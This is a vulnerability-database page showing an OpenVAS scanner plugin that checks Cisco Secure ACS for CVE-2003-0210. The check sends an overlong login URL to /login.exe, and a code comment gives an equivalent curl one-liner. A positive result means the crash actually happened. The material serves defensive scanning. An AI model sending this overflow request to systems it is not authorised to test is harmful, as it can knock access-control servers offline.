CISCO Secure ACS Management Interface Login Overflow
🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2003 Xue Yong ZhiType
openvas🔗 plugins.openvas.org👁 34 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CiscoSecure ACS for Windows CSAdmin Login Overflow DoS | 30 Apr 200300:00 | – | nessus | |
| CVE-2003-0210 | 26 Apr 200304:00 | – | cve | |
| CVE-2003-0210 | 26 Apr 200304:00 | – | cvelist | |
| EUVD-2003-0205 | 7 Oct 202500:30 | – | euvd | |
| CVE-2003-0210 | 12 May 200304:00 | – | nvd | |
| Cisco Security Advisory: Cisco Secure Access Control Server for Windows Admin Buffer Overflow Vulnerability | 23 Apr 200300:00 | – | securityvulns | |
| NSFOCUS SA2003-04 : Remote Buffer Overflow Vulnerability in Web Management Interface of Cisco Secure ACS | 24 Apr 200300:00 | – | securityvulns | |
| Cisco Secure ACS for Windows CSAdmin vulnerable to buffer overflow via login requests | 5 Jun 200300:00 | – | cert |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/7413 |
# SPDX-FileCopyrightText: 2003 Xue Yong Zhi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.11556");
script_version("2025-04-11T05:40:28+0000");
script_tag(name:"last_modification", value:"2025-04-11 05:40:28 +0000 (Fri, 11 Apr 2025)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/7413");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2003-0210");
script_name("CISCO Secure ACS Management Interface Login Overflow");
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright("Copyright (C) 2003 Xue Yong Zhi");
script_family("CISCO");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 2002);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"solution", value:"Cisco has already released a patch for this problem.");
script_tag(name:"summary", value:"It may be possible to make this Cisco Secure ACS web
server(login.exe) execute arbitrary code by sending it a too long login url.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("http_func.inc");
include("http_404.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
port = http_get_port( default:2002 );
if( http_is_dead( port:port ) )
exit( 0 );
if( http_is_cgi_installed_ka( port:port, item:"/login.exe" ) ) {
# curl -i "http://host:2002/login.exe?user=`perl -e "print ('a'x400)"`&reply=any&id=1"
url = string( "/login.exe?user=", crap(400), "&reply=any&id=1" );
req = http_get( item:url, port:port );
res = http_send_recv( port:port, data:req );
#The request will make a vulnerable server suspend until a restart
if( http_is_dead( port:port ) ) {
security_message( port:port );
exit( 0 );
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
EPSS0.06007